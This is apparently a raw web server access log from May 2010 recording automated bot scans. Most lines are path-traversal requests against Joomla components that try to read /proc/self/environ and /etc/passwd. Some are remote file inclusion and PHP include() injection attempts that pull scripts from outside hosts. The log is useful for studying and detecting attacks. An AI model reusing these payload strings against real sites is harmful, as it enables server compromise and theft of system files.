67.195.112.180 - - [28/May/2010:07:25:35 -0500] "GET /logs/access_log.1170201600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.104.108 - - [28/May/2010:07:26:02 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:26:02 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:26:06 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:26:06 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:26:17 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:26:17 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:26:22 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:26:22 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:26:39 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:26:39 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:26:44 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:26:45 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:27:06 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:27:07 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:27:23 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:27:23 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
187.45.193.159 - - [28/May/2010:07:27:54 -0500] "GET /logs//index2.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
187.45.193.159 - - [28/May/2010:07:27:54 -0500] "GET //index2.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
91.121.104.108 - - [28/May/2010:07:28:23 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:28:23 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:28:24 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:28:24 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:28:49 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:28:49 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:29:13 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:29:13 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
93.174.120.30 - - [28/May/2010:07:29:44 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
93.174.120.30 - - [28/May/2010:07:29:44 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
93.174.120.30 - - [28/May/2010:07:29:44 -0500] "GET /logs//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 7294 "-""libwww-perl/5.831"
93.174.120.30 - - [28/May/2010:07:31:42 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
87.250.255.243 - - [28/May/2010:07:34:38 -0500] "GET /logs/access_log.1259107200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.133.201.194 - - [28/May/2010:07:35:31 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:07:35:31 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.135.106 - - [28/May/2010:07:38:36 -0500] "GET /logs//////?skin_board_path=http://www.fimaonline.org/id? HTTP/1.1" 200 7298 "-""libwww-perl/5.831"
67.227.135.106 - - [28/May/2010:07:38:36 -0500] "GET //////?skin_board_path=http://www.fimaonline.org/id? HTTP/1.1" 200 1007 "-""libwww-perl/5.831"
91.121.104.108 - - [28/May/2010:07:41:06 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:41:06 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:41:06 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:41:06 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:41:07 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:41:07 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:41:08 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:41:08 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:41:09 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:41:09 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:41:13 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:41:14 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:41:14 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:41:14 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:41:15 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:41:15 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:41:24 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:41:25 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:41:26 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:41:26 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:41:26 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:41:26 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:41:28 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:41:28 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:41:53 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:41:53 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:41:54 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:41:55 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
174.133.201.194 - - [28/May/2010:07:43:04 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:07:43:04 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
125.248.150.84 - - [28/May/2010:07:45:28 -0500] "GET /logs/index.php?option=com_jeformcr&view=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
125.248.150.84 - - [28/May/2010:07:45:28 -0500] "GET /index.php?option=com_jeformcr&view=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
125.248.150.84 - - [28/May/2010:07:45:28 -0500] "GET /logs/access_log.1272412800/index.php?option=com_jeformcr&view=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.248.150.84 - - [28/May/2010:07:45:29 -0500] "GET /logs/access_log.1272412800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.248.150.84 - - [28/May/2010:07:45:29 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0"
125.248.150.84 - - [28/May/2010:07:45:29 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0"
216.97.225.115 - - [28/May/2010:07:47:38 -0500] "GET /index2.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.814"
211.174.62.150 - - [28/May/2010:07:50:23 -0500] "GET /logs/access_log.1271548800///?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.174.62.150 - - [28/May/2010:07:50:23 -0500] "GET ///?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
211.174.62.150 - - [28/May/2010:07:50:23 -0500] "GET /logs///?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 200 7295 "-""Mozilla/5.0"
207.46.195.233 - - [28/May/2010:07:51:28 -0500] "GET /logs/access_log.1231632000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.44.120.3 - - [28/May/2010:07:52:18 -0500] "GET /logs/postscript.php?p_mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:07:52:18 -0500] "GET /postscript.php?p_mode=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
80.233.172.42 - - [28/May/2010:07:53:18 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
80.233.172.42 - - [28/May/2010:07:53:19 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
174.120.226.220 - - [28/May/2010:07:53:40 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
174.120.226.220 - - [28/May/2010:07:53:40 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
87.250.255.243 - - [28/May/2010:07:54:15 -0500] "GET /logs/access_log.1244505600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.174.62.150 - - [28/May/2010:07:54:17 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
211.174.62.150 - - [28/May/2010:07:54:17 -0500] "GET /logs/access_log.1271721600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.174.62.150 - - [28/May/2010:07:54:17 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.174.62.150 - - [28/May/2010:07:54:23 -0500] "GET /logs/access_log.1270598400//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
192.167.114.31 - - [28/May/2010:07:54:28 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
192.167.114.31 - - [28/May/2010:07:54:28 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
192.167.114.31 - - [28/May/2010:07:54:47 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
192.167.114.31 - - [28/May/2010:07:54:48 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
211.174.62.150 - - [28/May/2010:07:55:33 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
211.174.62.150 - - [28/May/2010:07:55:33 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.174.62.150 - - [28/May/2010:07:55:33 -0500] "GET /logs/access_log.1271721600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.174.62.150 - - [28/May/2010:07:55:34 -0500] "GET /logs/access_log.1270598400//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.174.62.150 - - [28/May/2010:07:56:56 -0500] "GET /logs/access_log.1271116800///?_zb_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
209.44.120.3 - - [28/May/2010:07:59:31 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:07:59:31 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:08:01:48 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:08:02:59 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:08:02:59 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.126.254.139 - - [28/May/2010:08:03:00 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 326 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:03:00 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:03:00 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:03:04 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:03:04 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 302 "-""Mozilla/5.0"
209.126.254.139 - - [28/May/2010:08:03:04 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 326 "-""Mozilla/5.0"
209.44.120.3 - - [28/May/2010:08:03:45 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.44.120.3 - - [28/May/2010:08:03:45 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
187.45.193.159 - - [28/May/2010:08:03:48 -0500] "GET /logs//index2.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
187.45.193.159 - - [28/May/2010:08:03:49 -0500] "GET //index2.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
209.126.254.139 - - [28/May/2010:08:05:03 -0500] "GET /logs/access_log.1223683200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://bnydusa.com/en/wt/data/sc1? HTTP/1.1" 404 326 "-""Mozilla/5.0"
